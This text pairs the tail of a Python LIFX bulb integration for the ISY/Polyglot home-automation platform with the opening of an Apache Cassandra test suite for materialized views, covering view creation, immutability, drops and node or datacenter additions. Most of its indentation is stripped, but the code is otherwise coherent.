new_color[1] = int(_val)
driver = ['GV2', new_color[1]]
elif _cmd == 'SETB':
new_color[2] = int(_val)
driver = ['GV3', new_color[2]]
elif _cmd == 'CLITEMP':
new_color[3] = int(_val)
driver = ['CLITEMP', new_color[3]]
elif _cmd == 'RR':
self.duration = _val
driver = ['RR', self.duration]
self.color[zone] = new_color
if self.current_zone == 0:
self.device.set_color(new_color, self.duration, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, self.duration, rapid=False)
except (lifxlan.WorkflowException, TypeError) as ex:
LOGGER.error('setmanual mz error {}'.format(ex))
LOGGER.info('Received manual change, updating the mz bulb zone {} to: {} duration: {}'.format(zone, new_color, self.duration))
if driver:
self.setDriver(driver[0], driver[1])
else: LOGGER.info('Received manual change, however the mz bulb is in a disconnected state... ignoring')
def setHSBKDZ(self, command):
query = command.get('query')
if not self.pending:
self.new_color = deepcopy(self.color)
self.pending = True
current_zone = int(query.get('Z.uom56'))
zone = deepcopy(current_zone)
if current_zone != 0: zone -= 1
self.new_color[zone] = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
try:
self.duration = int(query.get('D.uom42'))
except TypeError:
self.duration = 0
try:
if current_zone == 0:
self.device.set_color(self.new_color, self.duration, rapid=False)
else:
self.device.set_zone_color(zone, zone, self.new_color, self.duration, rapid=False, apply = 0)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('set mz hsbkdz error %s', str(ex))
commands = {
'DON': setOn, 'DOF': Light.setOff,
'APPLY': apply, 'QUERY': Light.query,
'SET_COLOR': setColor, 'SETH': setManual,
'SETS': setManual, 'SETB': setManual,
'CLITEMP': setManual, 'RR': setManual,
'SETZ': setManual, 'SET_HSBKDZ': setHSBKDZ,
'BRT': brighten, 'DIM': dim,
'FDUP': fade_up, 'FDDOWN': fade_down,
'FDSTOP': fade_stop, 'DFON': setOn,
'DFOF': Light.setOff, 'SETIR': Light.set_ir_brightness,
'WAVEFORM': Light.set_wf
}
drivers = [{'driver': 'ST', 'value': 0, 'uom': 51},
{'driver': 'GV0', 'value': 0, 'uom': 56},
{'driver': 'GV1', 'value': 0, 'uom': 56},
{'driver': 'GV2', 'value': 0, 'uom': 56},
{'driver': 'GV3', 'value': 0, 'uom': 56},
{'driver': 'CLITEMP', 'value': 0, 'uom': 26},
{'driver': 'GV4', 'value': 0, 'uom': 56},
{'driver': 'GV5', 'value': 0, 'uom': 2},
{'driver': 'GV6', 'value': 0, 'uom': 20},
{'driver': 'GV7', 'value': 0, 'uom': 56},
{'driver': 'RR', 'value': 0, 'uom': 42}]
id = 'lifxmultizone'
class Group(polyinterface.Node):
"""
LiFX Group Node Class
"""
def __init__(self, controller, primary, address, gid, label, gupdatedat):
self.label = label.replace("'", "")
super().__init__(controller, primary, address, 'LIFX Group ' + str(label))
self.lifxLabel = label
self.lifxGroup = self.controller.lifxLan.get_devices_by_group(label)
self.numMembers = len(self.lifxGroup.devices)
def start(self):
self.update()
#self.reportDrivers()
def update(self):
self.numMembers = len(self.lifxGroup.devices)
self.setDriver('ST', self.numMembers)
def long_update(self):
pass
def query(self, command = None):
self.update()
self.reportDrivers()
def setOn(self, command):
try:
self.lifxGroup.set_power(True, rapid = False)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group seton error caught %s', str(ex))
else:
LOGGER.info('Received SetOn command for group {} from ISY. Setting all {} members to ON.'.format(self.label, self.numMembers))
def setOff(self, command):
try:
self.lifxGroup.set_power(False, rapid = False)
except (lifxlan.WorkflowException, IOError) as e:
LOGGER.error('group setoff error caught {}'.format(str(e)))
else:
LOGGER.info('Received SetOff command for group {} from ISY. Setting all {} members to OFF.'.format(self.label, self.numMembers))
def setColor(self, command):
_color = int(command.get('value'))
try:
self.lifxGroup.set_color(COLORS[_color][1], 0, rapid = False)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setcolor error caught %s', str(ex))
else:
LOGGER.info('Received SetColor command for group {} from ISY. Changing color to: {} for all {} members.'.format(self.name, COLORS[_color][0], self.numMembers))
def setHSBKD(self, command):
query = command.get('query')
        color = None
        duration = 0
        try:
            color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
            duration = int(query.get('D.uom42'))
        except TypeError:
            # Duration (D) is optional; a missing color cannot be sent to the group.
            if color is None:
                LOGGER.error('Group SET_HSBKD is missing one or more of the H, S, B, K values... ignoring')
                return
try:
self.lifxGroup.set_color(color, duration = duration, rapid = False)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group sethsbkd error caught {}'.format(str(ex)))
else:
            LOGGER.info('Received SetHSBKD command for group {} from ISY, setting all members to color {}, duration {}'.format(self.label, color, duration))
drivers = [{'driver': 'ST', 'value': 0, 'uom': 56}]
commands = {
'DON': setOn, 'DOF': setOff, 'QUERY': query,
'SET_COLOR': setColor, 'SET_HSBKD': setHSBKD
}
id = 'lifxgroup'
if __name__ == "__main__":
try:
polyglot = polyinterface.Interface('LiFX')
polyglot.start()
control = Controller(polyglot)
control.runForever()
except (KeyboardInterrupt, SystemExit):
sys.exit(0)
|
materialized_views_test.py
|
import collections
import re
import sys
import time
import traceback
import pytest
import threading
import logging
from flaky import flaky
from enum import Enum
from queue import Empty
from functools import partial
from multiprocessing import Process, Queue
from cassandra import ConsistencyLevel, InvalidRequest, WriteFailure
from cassandra.cluster import NoHostAvailable
from cassandra.concurrent import execute_concurrent_with_args
from cassandra.cluster import Cluster
from cassandra.query import SimpleStatement
from distutils.version import LooseVersion
from dtest import Tester, get_ip_from_node, create_ks
from tools.assertions import (assert_all, assert_crc_check_chance_equal,
assert_invalid, assert_none, assert_one,
assert_unavailable)
from tools.data import rows_to_list
from tools.misc import new_node
from tools.jmxutils import (JolokiaAgent, make_mbean)
since = pytest.mark.since
logger = logging.getLogger(__name__)
# CASSANDRA-10978. Migration wait (in seconds) to use in bootstrapping tests. Needed to handle
# pathological case of flushing schema keyspace for multiple data directories. See CASSANDRA-6696
# for multiple data directory changes and CASSANDRA-10421 for compaction logging that must be
# written.
MIGRATION_WAIT = 5
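# Editorial note (added): MIGRATION_WAIT is passed to bootstrapping nodes as a
# JVM flag in the tests below, e.g.
#   node.start(jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])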
@flaky
@since('3.0')
class TestMaterializedViews(Tester):
"""
Test materialized views implementation.
@jira_ticket CASSANDRA-6477
@since 3.0
"""
def _rows_to_list(self, rows):
new_list = [list(row) for row in rows]
return new_list
def prepare(self, user_table=False, rf=1, options=None, nodes=3, install_byteman=False, **kwargs):
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate([nodes, 0], install_byteman=install_byteman)
if options:
cluster.set_configuration_options(values=options)
cluster.start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1, **kwargs)
create_ks(session, 'ks', rf)
if user_table:
session.execute(
("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username));")
)
# create a materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_state AS "
"SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
"PRIMARY KEY (state, username)"))
return session
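    # Editorial usage sketch (added): a typical test in this class starts with
    #   session = self.prepare(user_table=True, rf=3, nodes=3)
    # and then exercises both the base table and the view, e.g.
    #   session.execute("SELECT * FROM users_by_state WHERE state='TX'")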
def update_view(self, session, query, flush, compact=False):
session.execute(query)
self._replay_batchlogs()
if flush:
self.cluster.flush()
if compact:
self.cluster.compact()
def _settle_nodes(self):
logger.debug("Settling all nodes")
stage_match = re.compile(r"(?P<name>\S+)\s+(?P<active>\d+)\s+(?P<pending>\d+)\s+(?P<completed>\d+)\s+(?P<blocked>\d+)\s+(?P<alltimeblocked>\d+)")
def _settled_stages(node):
(stdout, stderr, rc) = node.nodetool("tpstats")
lines = re.split("\n+", stdout)
for line in lines:
match = stage_match.match(line)
if match is not None:
active = int(match.group('active'))
pending = int(match.group('pending'))
if active != 0 or pending != 0:
logger.debug("%s - pool %s still has %d active and %d pending" % (node.name, match.group("name"), active, pending))
return False
return True
for node in self.cluster.nodelist():
if node.is_running():
node.nodetool("replaybatchlog")
attempts = 50 # 100 milliseconds per attempt, so 5 seconds total
while attempts > 0 and not _settled_stages(node):
time.sleep(0.1)
attempts -= 1
def _build_progress_table(self):
if self.cluster.version() >= '4':
return 'system.view_builds_in_progress'
else:
return 'system.views_builds_in_progress'
def _wait_for_view(self, ks, view):
logger.debug("waiting for view")
def _view_build_finished(node):
s = self.patient_exclusive_cql_connection(node)
query = "SELECT * FROM %s WHERE keyspace_name='%s' AND view_name='%s'" %\
(self._build_progress_table(), ks, view)
result = list(s.execute(query))
return len(result) == 0
for node in self.cluster.nodelist():
if node.is_running():
attempts = 50 # 1 sec per attempt, so 50 seconds total
while attempts > 0 and not _view_build_finished(node):
time.sleep(1)
attempts -= 1
if attempts <= 0:
raise RuntimeError("View {}.{} build not finished after 50 seconds.".format(ks, view))
def _wait_for_view_build_start(self, session, ks, view, wait_minutes=2):
"""Wait for the start of a MV build, ensuring that it has saved some progress"""
start = time.time()
while True:
try:
query = "SELECT COUNT(*) FROM %s WHERE keyspace_name='%s' AND view_name='%s'" %\
(self._build_progress_table(), ks, view)
result = list(session.execute(query))
assert 0 == result[0].count
except AssertionError:
break
elapsed = (time.time() - start) / 60
if elapsed > wait_minutes:
pytest.fail("The MV build hasn't started in 2 minutes.")
def _insert_data(self, session):
# insert data
insert_stmt = "INSERT INTO users (username, password, gender, state, birth_year) VALUES "
session.execute(insert_stmt + "('user1', 'ch@ngem3a', 'f', 'TX', 1968);")
session.execute(insert_stmt + "('user2', 'ch@ngem3b', 'm', 'CA', 1971);")
session.execute(insert_stmt + "('user3', 'ch@ngem3c', 'f', 'FL', 1978);")
session.execute(insert_stmt + "('user4', 'ch@ngem3d', 'm', 'TX', 1974);")
self._settle_nodes()
def _replay_batchlogs(self):
for node in self.cluster.nodelist():
if node.is_running():
logger.debug("Replaying batchlog on node {}".format(node.name))
node.nodetool("replaybatchlog")
# CASSANDRA-13069 - Ensure replayed mutations are removed from the batchlog
node_session = self.patient_exclusive_cql_connection(node)
result = list(node_session.execute("SELECT count(*) FROM system.batches;"))
assert result[0].count == 0
def _assert_view_meta(self, session, views, exists=True, nodes=2):
if exists:
assert_one(session, "SELECT COUNT(*) FROM system.built_views", [views])
if self.cluster.version() >= '3.11':
assert_one(session, "SELECT COUNT(*) FROM system_distributed.view_build_status", [views * nodes])
else:
assert_none(session, "SELECT * FROM system.built_views")
if self.cluster.version() >= '3.11':
assert_none(session, "SELECT * FROM system_distributed.view_build_status")
assert_none(session, "SELECT * FROM {}".format(self._build_progress_table()))
def test_view_metadata_cleanup(self):
"""
drop keyspace or view should clear built_views and view_build_status
"""
session = self.prepare(rf=2, nodes=2)
def populate_data(session, rows):
logger.debug("populate base data")
for v in range(rows):
session.execute("INSERT INTO t(k,c,a,b,e,f) VALUES({v},{v},{v},{v},{v},{v})".format(v=v))
def verify_data(session, rows, views):
logger.debug("verify view data")
for v in range(rows):
for view in range(views):
assert_one(session, "SELECT * FROM mv{} WHERE k={v} AND c={v}".format(view, v=v), [v, v, v, v, v, v])
def create_keyspace(session, ks="ks1", rf=2):
create_ks(session, ks, rf)
def create_table(session):
logger.debug("create base table")
session.execute("CREATE TABLE t (k int, c int, a int, b int, e int, f int, primary key(k, c))")
def create_views(session, views, keyspace="ks1"):
logger.debug("create view")
for view in range(views):
session.execute("CREATE MATERIALIZED VIEW mv{} AS SELECT * FROM t "
"WHERE k IS NOT NULL AND c IS NOT NULL PRIMARY KEY (c,k)".format(view),
timeout=60)
self._wait_for_view(keyspace, "mv{}".format(view))
def drop_keyspace(session, keyspace="ks1"):
logger.debug("drop keyspace {}".format(keyspace))
session.execute("DROP KEYSPACE IF EXISTS {}".format(keyspace),
timeout=60)
def drop_views(session, views):
logger.debug("drop all views")
for view in range(views):
session.execute("DROP MATERIALIZED VIEW IF EXISTS mv{}".format(view))
rows = 100
views = 5
create_keyspace(session)
create_table(session)
populate_data(session, rows)
create_views(session, views)
verify_data(session, rows, views)
self._assert_view_meta(session, views)
drop_keyspace(session)
self._assert_view_meta(session, views, exists=False)
create_keyspace(session)
create_table(session)
populate_data(session, rows)
create_views(session, views)
verify_data(session, rows, views)
self._assert_view_meta(session, views)
drop_views(session, views)
self._assert_view_meta(session, views, exists=False)
def test_create(self):
"""Test the materialized view creation"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
        assert len(result) == 1, "Expecting 1 materialized view, got " + str(result)
def test_gcgs_validation(self):
"""Verify that it's not possible to create or set a too low gc_grace_seconds on MVs"""
session = self.prepare(user_table=True)
# Shouldn't be able to alter the gc_grace_seconds of the base table to 0
assert_invalid(session,
"ALTER TABLE users WITH gc_grace_seconds = 0",
"Cannot alter gc_grace_seconds of the base table of a materialized view "
"to 0, since this value is used to TTL undelivered updates. Setting "
"gc_grace_seconds too low might cause undelivered updates to expire "
"before being replayed.")
        # But we can alter the gc_grace_seconds of the base table to a value != 0
session.execute("ALTER TABLE users WITH gc_grace_seconds = 10")
# Shouldn't be able to alter the gc_grace_seconds of the MV to 0
assert_invalid(session,
"ALTER MATERIALIZED VIEW users_by_state WITH gc_grace_seconds = 0",
"Cannot alter gc_grace_seconds of a materialized view to 0, since "
"this value is used to TTL undelivered updates. Setting gc_grace_seconds "
"too low might cause undelivered updates to expire before being replayed.")
# Now let's drop MV
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
# Now we should be able to set the gc_grace_seconds of the base table to 0
session.execute("ALTER TABLE users WITH gc_grace_seconds = 0")
# Now we shouldn't be able to create a new MV on this table
assert_invalid(session,
"CREATE MATERIALIZED VIEW users_by_state AS "
"SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
"PRIMARY KEY (state, username)",
"Cannot create materialized view 'users_by_state' for base table 'users' "
"with gc_grace_seconds of 0, since this value is used to TTL undelivered "
"updates. Setting gc_grace_seconds too low might cause undelivered updates"
" to expire before being replayed.")
def test_insert(self):
"""Test basic insertions"""
session = self.prepare(user_table=True)
self._insert_data(session)
result = list(session.execute("SELECT * FROM users;"))
        assert len(result) == 4, "Expecting {} users, got {}".format(4, len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='TX';"))
        assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='CA';"))
        assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='MA';"))
        assert len(result) == 0, "Expecting {} users, got {}".format(0, len(result))
def test_populate_mv_after_insert(self):
"""Test that a view is OK when created with existing data"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({v}, {v})".format(v=i))
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("wait for view to build")
self._wait_for_view("ks", "t_by_v")
logger.debug("wait that all batchlogs are replayed")
self._replay_batchlogs()
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(i), [i, i])
@pytest.mark.xfail(reason="Should be addressed with CASSANDRA-15845")
@since('4.0')
def test_populate_mv_after_insert_wide_rows_version40(self):
self.test_populate_mv_after_insert_wide_rows()
@since('3.0', max_version='3.X')
def test_populate_mv_after_insert_wide_rows(self):
"""Test that a view is OK when created with existing data with wide rows"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v))")
for i in range(5):
for j in range(10000):
session.execute("INSERT INTO t (id, v) VALUES ({}, {})".format(i, j))
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("wait for view to build")
self._wait_for_view("ks", "t_by_v")
logger.debug("wait that all batchlogs are replayed")
self._replay_batchlogs()
for i in range(5):
for j in range(10000):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, j), [j, i])
def test_crc_check_chance(self):
"""Test that crc_check_chance parameter is properly populated after mv creation and update"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id) WITH crc_check_chance = 0.5"))
assert_crc_check_chance_equal(session, "t_by_v", 0.5, view=True)
session.execute("ALTER MATERIALIZED VIEW t_by_v WITH crc_check_chance = 0.3")
assert_crc_check_chance_equal(session, "t_by_v", 0.3, view=True)
def test_prepared_statement(self):
"""Test basic insertions with prepared statement"""
session = self.prepare(user_table=True)
insertPrepared = session.prepare(
"INSERT INTO users (username, password, gender, state, birth_year) VALUES (?, ?, ?, ?, ?);"
)
selectPrepared = session.prepare(
"SELECT state, password, session_token FROM users_by_state WHERE state=?;"
)
# insert data
session.execute(insertPrepared.bind(('user1', 'ch@ngem3a', 'f', 'TX', 1968)))
session.execute(insertPrepared.bind(('user2', 'ch@ngem3b', 'm', 'CA', 1971)))
session.execute(insertPrepared.bind(('user3', 'ch@ngem3c', 'f', 'FL', 1978)))
session.execute(insertPrepared.bind(('user4', 'ch@ngem3d', 'm', 'TX', 1974)))
result = list(session.execute("SELECT * FROM users;"))
assert len(result) == 4, "Expecting {} users, got {}".format(4, len(result))
result = list(session.execute(selectPrepared.bind(['TX'])))
assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))
result = list(session.execute(selectPrepared.bind(['CA'])))
assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))
result = list(session.execute(selectPrepared.bind(['MA'])))
assert len(result) == 0, "Expecting {} users, got {}".format(0, len(result))
def test_immutable(self):
"""Test that a materialized view is immutable"""
session = self.prepare(user_table=True)
# cannot insert
assert_invalid(session, "INSERT INTO users_by_state (state, username) VALUES ('TX', 'user1');",
"Cannot directly modify a materialized view")
# cannot update
assert_invalid(session, "UPDATE users_by_state SET session_token='XYZ' WHERE username='user1' AND state = 'TX';",
"Cannot directly modify a materialized view")
# cannot delete a row
assert_invalid(session, "DELETE from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot delete a cell
assert_invalid(session, "DELETE session_token from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot alter a table
assert_invalid(session, "ALTER TABLE users_by_state ADD first_name varchar",
"Cannot use ALTER TABLE on Materialized View")
def test_drop_mv(self):
"""Test that we can drop a view properly"""
session = self.prepare(user_table=True)
# create another materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_birth_year AS "
"SELECT * FROM users WHERE birth_year IS NOT NULL AND "
"username IS NOT NULL PRIMARY KEY (birth_year, username)"))
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 2, "Expecting {} materialized view, got {}".format(2, len(result))
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
def test_drop_column(self):
"""Test that we cannot drop a column if it is used by a MV"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
assert_invalid(
session,
"ALTER TABLE ks.users DROP state;",
"Cannot drop column state on base table with materialized views."
)
def test_drop_table(self):
"""Test that we cannot drop a table without deleting its MVs first"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
assert_invalid(
session,
"DROP TABLE ks.users;",
"Cannot drop table when materialized views still depend on it"
)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
session.execute("DROP TABLE ks.users;")
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
        assert len(result) == 0, "Expecting {} materialized view, got {}".format(0, len(result))
def test_clustering_column(self):
"""Test that we can use clustering columns as primary key for a materialized view"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute(("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username, state, birth_year));"))
# create a materialized view that use a compound key
session.execute(("CREATE MATERIALIZED VIEW users_by_state_birth_year "
"AS SELECT * FROM users WHERE state IS NOT NULL AND birth_year IS NOT NULL "
"AND username IS NOT NULL PRIMARY KEY (state, birth_year, username)"))
session.cluster.control_connection.wait_for_schema_agreement()
self._insert_data(session)
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX'"))
assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))
result = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX' AND birth_year=1968"))
assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))
def _add_dc_after_mv_test(self, rf, nts):
"""
@jira_ticket CASSANDRA-10978
Add datacenter with configurable replication.
"""
session = self.prepare(rf=rf)
logger.debug("Creating schema")
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Writing 1k to base")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Reading 1k from view")
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
logger.debug("Reading 1k from base")
for i in range(1000):
assert_one(session, "SELECT * FROM t WHERE id = {}".format(i), [i, -i])
logger.debug("Bootstrapping new node in another dc")
node4 = new_node(self.cluster, data_center='dc2')
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
logger.debug("Bootstrapping new node in another dc")
node5 = new_node(self.cluster, remote_debug_port='1414', data_center='dc2')
node5.start(jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)], wait_for_binary_proto=True)
if nts:
session.execute("alter keyspace ks with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
session.execute("alter keyspace system_auth with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
session.execute("alter keyspace system_traces with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
node4.nodetool('rebuild dc1')
node5.nodetool('rebuild dc1')
cl = ConsistencyLevel.LOCAL_ONE if nts else ConsistencyLevel.ONE
session2 = self.patient_exclusive_cql_connection(node4, consistency_level=cl)
logger.debug("Verifying data from new node in view")
for i in range(1000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])
logger.debug("Inserting 100 into base")
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Verify 100 in view")
for i in range(1000, 1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
@pytest.mark.resource_intensive
def test_add_dc_after_mv_simple_replication(self):
"""
@jira_ticket CASSANDRA-10634
Test that materialized views work as expected when adding a datacenter with SimpleStrategy.
"""
self._add_dc_after_mv_test(1, False)
@pytest.mark.resource_intensive
def test_add_dc_after_mv_network_replication(self):
"""
@jira_ticket CASSANDRA-10634
Test that materialized views work as expected when adding a datacenter with NetworkTopologyStrategy.
"""
self._add_dc_after_mv_test({'dc1': 1}, True)
@pytest.mark.resource_intensive
def test_add_node_after_mv(self):
"""
@jira_ticket CASSANDRA-10978
Test that materialized views work as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
node4 = new_node(self.cluster, data_center="dc1")
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
"""
@jira_ticket CASSANDRA-12984
Assert that MVs are marked as built after bootstrap. Otherwise newly streamed MVs would be built again.
"""
assert_one(session2, "SELECT count(*) FROM system.built_views WHERE keyspace_name = 'ks' AND view_name = 't_by_v'", [1])
for i in range(1000):
assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])
for i in range(1000, 1100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
for i in range(1000, 1100):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
def test_insert_during_range_movement_rf1(self):
self._base_test_insert_during_range_movement(rf=1)
def test_insert_during_range_movement_rf2(self):
self._base_test_insert_during_range_movement(rf=2)
def test_insert_during_range_movement_rf3(self):
self._base_test_insert_during_range_movement(rf=3)
def _base_test_insert_during_range_movement(self, rf):
"""
@jira_ticket CASSANDRA-14251
Test that materialized view replication works in the middle of a join
for different replication factors.
"""
session = self.prepare(rf=rf)
logger.debug("Creating table and view")
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("Starting new node4 in write survey mode")
node4 = new_node(self.cluster, data_center="dc1")
# Set batchlog.replay_timeout_in_ms=1 so we can ensure the batchlog is replayed below
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true",
"-Dcassandra.batchlog.replay_timeout_in_ms=1"])
logger.debug("Insert data while node4 is joining")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))
logger.debug("Finish joining node4")
node4.nodetool("join")
logger.debug('Replay batchlogs')
time.sleep(0.001) # Wait batchlog.replay_timeout_in_ms=1 (ms)
self._replay_batchlogs()
logger.debug("Verify data")
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
@pytest.mark.resource_intensive
def test_add_node_after_wide_mv_with_range_deletions(self):
"""
@jira_ticket CASSANDRA-11670
Test that wide materialized views work as expected when adding a node.
"""
session = self.prepare()
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v)) WITH compaction = { 'class': 'SizeTieredCompactionStrategy', 'enabled': 'false' }")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
for i in range(10):
for j in range(100):
session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))
self.cluster.flush()
for i in range(10):
for j in range(100):
assert_one(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
for i in range(10):
for j in range(100):
if j % 10 == 0:
session.execute("DELETE FROM t WHERE id = {} AND v >= {} and v < {}".format(i, j, j + 2))
self.cluster.flush()
for i in range(10):
for j in range(100):
if j % 10 == 0 or (j - 1) % 10 == 0:
assert_none(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j))
assert_none(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j), [i, j])
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
node4 = new_node(self.cluster, data_center="dc1")
node4.set_configuration_options(values={'max_mutation_size_in_kb': 20}) # CASSANDRA-11670
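# A small max_mutation_size_in_kb presumably forces the wide streamed partitions over the mutation
# size limit, exercising the CASSANDRA-11670 path that splits view updates into smaller mutations.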
logger.debug("Start join at {}".format(time.strftime("%H:%M:%S")))
node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])
session2 = self.patient_exclusive_cql_connection(node4)
for i in range(10):
for j in range(100):
if j % 10 == 0 or (j - 1) % 10 == 0:
assert_none(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j))
assert_none(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j))
else:
assert_one(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j), [i, j])
